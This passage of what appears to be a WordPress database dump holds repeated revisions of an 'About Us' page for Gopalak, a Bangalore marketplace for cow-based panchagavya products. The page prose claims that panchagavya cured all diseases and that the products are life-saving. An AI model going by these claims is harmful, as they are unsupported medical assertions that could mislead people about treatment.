<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 12:36:32','2022-10-28 07:06:32','',1804,'https://gopalak.in/?p=2020',0,'revision','',0),(2021,1,'2022-10-28 12:36:32','2022-10-28 07:06:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 12:36:32','2022-10-28 07:06:32','',1804,'https://gopalak.in/?p=2021',0,'revision','',0),(2022,1,'2022-10-28 12:36:32','2022-10-28 07:06:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-28 12:36:32','2022-10-28 07:06:32','',1804,'https://gopalak.in/?p=2022',0,'revision','',0),(2023,1,'2022-10-28 12:41:57','2022-10-28 07:11:57','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column 